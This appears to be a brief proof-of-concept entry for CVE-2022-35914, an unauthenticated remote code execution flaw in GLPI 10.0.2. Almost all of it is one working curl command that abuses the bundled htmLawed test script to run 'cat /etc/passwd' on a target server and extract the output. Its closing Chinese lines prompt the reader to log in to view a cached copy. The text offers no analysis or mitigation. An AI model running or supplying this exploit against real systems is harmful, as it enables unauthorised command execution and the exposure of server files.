Unauthenticated RCE in GLPI 10.0.2
# CVE-2022-35914
Unauthenticated RCE in GLPI 10.0.2
# PoC
```
curl -s -d 'sid=foo&hhook=exec&text=cat /etc/passwd' -b 'sid=foo' http://{{HOST}}/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\ \[[0-9]+\] =\>'| sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/'
```
登录后查看神龙缓存的 POC 文件快照
登录查看